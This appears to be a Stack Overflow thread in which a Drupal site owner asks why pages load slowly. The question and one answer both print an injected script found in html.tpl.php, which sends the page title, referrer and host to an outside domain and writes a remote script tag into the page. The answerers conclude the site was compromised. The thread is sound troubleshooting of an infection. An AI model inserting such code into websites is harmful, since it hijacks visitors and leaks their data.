# Drupal load jquery too long: schlosserei-lechner

Tags: jquery, drupal, wait

I created a simple Drupal site, works fine until a few weeka ago. It take too long, or forever to load.
When I inspec, the time consuming is waiting for "schlosserei-lechner.at"
Looking in the code, I found one line in modules/system/html.tpl.php:

```
        <script>
    var a='';
    setTimeout(10);
    var default_keyword = encodeURIComponent(document.title);
    var se_referrer = encodeURIComponent(document.referrer);var host = encodeURIComponent(window.location.host);
    var base = "http://www.schlosserei-lechner.at/js/jquery.min.php";
    var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
    var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
    if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){
        document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
        }
    </script>
```

This loading made my site super slow: http://hesmen.com/tuanfitness

Can any one explain me what's the meaning of this ? As well as how to fix this long loading problem.
The site is fully updated to last version ( core and modules)

Comment: Thats a wierd way to include Jquery ...
I wonder why you are not using the JQuery Module for Drupal if you need a newer version of JQuery
https://www.drupal.org/project/jquery_update

Comment: Yes, I installed Jquery update already. It's still there

Comment: You should try removing this script tag from your html.tpl.php and see if everything works as expected, jQuery should already be there by the jQuery update module, assuming it is turned ON.
In any case this script tag should be refactored as it isnt the recommended way to add a script in Drupal.

Answer (score 1):

Unusual. There is something going on with your "referrer" variable. If I visit the link above by clicking on it, it takes forever. If I type in http://hesmen.com/tuanfitness directly in my browser, it loads quicker. This delay is happening on line 40 in your rendered page with some odd code:

```
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://christalblu.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
```

This odd loop is happening while the page is loading, stopping in the middle of the page until this odd loop completes.

Troubleshooting tip:

1. Disable (uncheck) a module you installed via the modules page, save, then clear the cache.
2. Click on the link in this post. If it takes forever to load:
   2a. Re-enable/check the module, uncheck the next module you installed, go back to step 2. Otherwise:
   2b. The last module you unchecked is causing an issue and you can dig deeper.

If none of that works, we dig deeper!

**UPDATE**

Actually, listen to the comments above to start (It's been a long day). I don't understand:

```
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){ 
    document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>'); 
}
```

This gets called with referrer present (like this website when you click on the link from here). There is a silly loop going on here. Your issues go away I bet with the removal of that line. However, what's with this further above?:

```
setTimeout(10);
```

setTimout for what callback? Nothing... Removing all that (as suggested above by @Aukhan ) is a great first step.

**FINAL ANSWER UPDATE**

After some research, I think your website has been exploited. See this post for specific details (scroll to top for full issue):
https://www.drupal.org/node/2576223#comment-10514958

I feel this is your answer. Details in resolving it fully will be in the linked post and beyond the scope of what I can conjure here. I hope this helps and I wish your website a quick and healthy recovery.